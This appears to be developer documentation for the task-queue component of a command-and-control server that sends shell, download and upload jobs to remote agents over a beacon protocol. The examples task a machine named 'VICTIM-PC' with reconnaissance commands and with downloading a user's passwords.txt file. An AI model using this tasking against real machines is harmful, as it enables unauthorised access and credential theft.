Overview
CommandQueue manages pending tasks for all agent sessions using asyncio queues. Each session has its own queue, and all tasks are persisted to the database for durability across server restarts.
Source: server/command_queue.py
TaskStatus Enum
class TaskStatus ( str , Enum ):
PENDING = 'PENDING'
DISPATCHED = 'DISPATCHED'
COMPLETE = 'COMPLETE'
ERROR = 'ERROR'
Represents the lifecycle state of a task.
Task queued, waiting to be sent to agent
Task sent to agent, awaiting result
Task executed successfully, result stored
Task execution failed or timed out
Task Dataclass
@dataclass
class Task :
task_id: str
session_id: str
command: str
args: list
timeout_s: int
queued_at: float
status: TaskStatus = TaskStatus. PENDING
Represents a single command task for an agent.
UUID of the agent session this task belongs to
Command type: shell, download, upload, sleep, etc.
Command-specific arguments. Example: ["whoami"] for shell command
Maximum execution time in seconds before timeout
Unix timestamp when task was queued
status
TaskStatus
default: "PENDING"
Current task status
CommandQueue Class
Constructor
Initializes empty command queue with asyncio lock.
Internal State:
self ._queues: dict[ str , asyncio.Queue] = {} # session_id -> Queue[Task]
self ._tasks: dict[ str , Task] = {} # task_id -> Task (for O(1) lookup)
self ._lock = asyncio.Lock()
Architecture:
One asyncio.Queue per session for FIFO task ordering
Flat task registry for fast lookups by task_id
Lock for thread-safe concurrent access
Methods
enqueue_task()
async def enqueue_task ( self , session_id : str , command : str , args : list ,
timeout_s : int , db : Database) -> str
Create a Task, add to session queue, persist to DB, return task_id.
UUID of the agent session to receive this task
Command type: shell, download, upload, sleep, etc.
Command-specific arguments
Maximum execution time in seconds
Database instance for persistence
Newly created task_id (UUID)
Example:
from server.command_queue import CommandQueue
from server.storage import Database
async with Database() as db:
cq = CommandQueue()
# Queue a shell command
task_id = await cq.enqueue_task(
session_id = '550e8400-e29b-41d4-a716-446655440000' ,
command = 'shell' ,
args = [ 'whoami' ],
timeout_s = 30 ,
db = db
)
print ( f "Task queued: { task_id } " )
# Queue a file download
task_id2 = await cq.enqueue_task(
session_id = '550e8400-e29b-41d4-a716-446655440000' ,
command = 'download' ,
args = [ 'C: \\ Users \\ jdoe \\ passwords.txt' ],
timeout_s = 60 ,
db = db
)
Behavior:
Generates new UUID for task_id
Sets queued_at to current time
Sets status to PENDING
Adds task to session’s queue (creates queue if needed)
Stores task in flat registry
Persists to database
Logs enqueue event
peek_task()
async def peek_task ( self , session_id : str , db : Database = None ) -> Task | None
Return the next PENDING task for a session without removing it from the queue.
UUID of the agent session
Optional database instance. If provided, checks DB for tasks not yet loaded into memory.
Next PENDING task if available, None if queue is empty
Example:
# Agent polls for next task
task = await cq.peek_task(session_id, db = db)
if task:
print ( f "Dispatching: { task.command } { task.args } " )
await cq.mark_dispatched(task.task_id, db)
else :
print ( "No pending tasks" )
Behavior:
Memory Check: Searches in-memory queue for PENDING tasks
Database Fallback: If no task in memory and db provided, queries database
Lazy Load: If task found in DB, loads into memory and adds to queue
Non-Destructive: Task remains in queue until status changes
Use Case: Server restart - tasks persist in DB and are loaded on first peek
mark_dispatched()
async def mark_dispatched ( self , task_id : str , db : Database) -> None
Set task status to DISPATCHED in memory and in DB.
UUID of the task to mark dispatched
Database instance for persistence
Example:
task = await cq.peek_task(session_id, db = db)
if task:
# Send task to agent via beacon response
await cq.mark_dispatched(task.task_id, db)
Behavior:
Updates task.status = TaskStatus.DISPATCHED in memory
Persists to database
Logs dispatch event
Next peek_task() call will skip this task (no longer PENDING)
mark_complete()
async def mark_complete ( self , task_id : str , result : dict ,
db : Database) -> None
Set task status to COMPLETE, persist result to DB.
UUID of the completed task
Task execution result containing:
stdout: Command standard output
stderr: Command standard error
exit_code: Process exit code
duration_ms: Execution duration in milliseconds
Database instance for persistence
Example:
# Agent submits task result
result = {
'stdout' : 'VICTIM-PC \\ jdoe' ,
'stderr' : '' ,
'exit_code' : 0 ,
'duration_ms' : 42
}
await cq.mark_complete(task_id, result, db)
# Result now available via CLI or web UI
Behavior:
Updates task.status = TaskStatus.COMPLETE in memory
Persists status to database
Inserts result row into database with generated result_id
Logs completion with exit_code
mark_error()
async def mark_error ( self , task_id : str , db : Database) -> None
Set task status to ERROR in memory and in DB.
Database instance for persistence
Example:
# Agent reports task timeout or execution failure
await cq.mark_error(task_id, db)
Behavior:
Updates task.status = TaskStatus.ERROR in memory
Persists to database
Logs error event
Use Cases:
Task timeout on agent
Command execution failure
Agent crash during execution
get_tasks_for_session()
async def get_tasks_for_session ( self , session_id : str ) -> list[Task]
Return all in-memory tasks for a session ordered by queued_at.
UUID of the agent session
List of Task objects sorted by queued_at ascending (oldest first)
Example:
tasks = await cq.get_tasks_for_session(session_id)
for task in tasks:
status_icon = {
TaskStatus. PENDING : '⏳' ,
TaskStatus. DISPATCHED : '📤' ,
TaskStatus. COMPLETE : '✓' ,
TaskStatus. ERROR : '✗'
}[task.status]
print ( f " { status_icon } { task.command } { task.args } - { task.status } " )
Output:
✓ shell ['whoami'] - COMPLETE
📤 download ['C:\\passwords.txt'] - DISPATCHED
⏳ shell ['ipconfig'] - PENDING
Use Cases:
CLI tasks command
Web UI task history
Operator monitoring
Usage Patterns
Complete Task Lifecycle
async with Database() as db:
cq = CommandQueue()
# Operator queues command via CLI
task_id = await cq.enqueue_task(
session_id = session_id,
command = 'shell' ,
args = [ 'whoami' ],
timeout_s = 30 ,
db = db
)
# Agent beacons and pulls task
task = await cq.peek_task(session_id, db = db)
if task:
# Server sends task to agent
await cq.mark_dispatched(task.task_id, db)
# Agent executes and returns result
result = {
'stdout' : 'VICTIM-PC \\ jdoe' ,
'stderr' : '' ,
'exit_code' : 0 ,
'duration_ms' : 42
}
await cq.mark_complete(task_id, result, db)
# Operator views results
tasks = await cq.get_tasks_for_session(session_id)
for t in tasks:
if t.status == TaskStatus. COMPLETE :
# Fetch result from database
results = await db.get_results_for_session(session_id)
print (results[ 0 ][ 'stdout' ])
Error Handling
# Agent timeout
if task_duration > task.timeout_s:
await cq.mark_error(task_id, db)
# Agent crash detection (server-side)
if time.time() - task.queued_at > task.timeout_s * 2 :
# Task dispatched but no result received
await cq.mark_error(task_id, db)
Queue Priority
Tasks are dispatched in FIFO order per session:
# Queue multiple tasks
await cq.enqueue_task(sid, 'shell' , [ 'whoami' ], 30 , db)
await cq.enqueue_task(sid, 'shell' , [ 'hostname' ], 30 , db)
await cq.enqueue_task(sid, 'shell' , [ 'ipconfig' ], 30 , db)
# peek_task() always returns oldest PENDING task
task1 = await cq.peek_task(sid, db) # Returns 'whoami'
await cq.mark_dispatched(task1.task_id, db)
task2 = await cq.peek_task(sid, db) # Returns 'hostname'
await cq.mark_dispatched(task2.task_id, db)
task3 = await cq.peek_task(sid, db) # Returns 'ipconfig'
Integration Points
Server Main
Used in server_main.py beacon handlers:
from server.command_queue import CommandQueue
cmd_queue = CommandQueue()
# Task pull handler
task = await cmd_queue.peek_task(session_id, db = db)
if task:
await cmd_queue.mark_dispatched(task.task_id, db)
return task_dispatch_response(task)
# Task result handler
await cmd_queue.mark_complete(task_id, result_payload, db)
CLI Commands
Used in cli/task_commands.py:
# Queue new task
task_id = await cmd_queue.enqueue_task(
session_id, command, args, timeout_s, db
)
# View task history
tasks = await cmd_queue.get_tasks_for_session(session_id)
for task in tasks:
display_task(task)
Testing
Self-Test Suite
Run built-in tests:
python -m server.command_queue
Test Coverage:
enqueue_task generates valid UUID
peek_task returns PENDING task
peek_task is non-destructive
mark_dispatched excludes task from future peeks
mark_complete stores result in DB
get_tasks_for_session ordering
peek_task returns None for unknown session
mark_error sets ERROR status
Output:
Running command_queue self-test...
[OK] enqueue_task
[OK] peek_task returns PENDING task
[OK] peek_task is non-destructive
[OK] mark_dispatched
[OK] mark_complete
[OK] get_tasks_for_session ordering
[OK] peek_task returns None for unknown session
[OK] mark_error
All command_queue self-tests passed.
All queued and in-flight tasks held in memory. 10,000 tasks consume ~5-10 MB RAM.
enqueue_task and peek_task are O(1) for in-memory operations. Database fallback in peek_task adds query latency.
Completed tasks remain in memory indefinitely. Consider periodic cleanup for long-running operations.
Single lock protects all queues. High task throughput may see contention. Consider per-session locks for scaling.
Logging
Structured logging with contextual fields:
logger.info( 'task enqueued' , extra = {
'session_id' : session_id,
'task_id' : task.task_id,
'command' : command,
})
Events:
Task enqueued
Task loaded from DB
Task dispatched
Task complete
Task error
Server Main Beacon endpoint integration
Database Task and result persistence
SessionManager Session state management
Task Commands CLI task management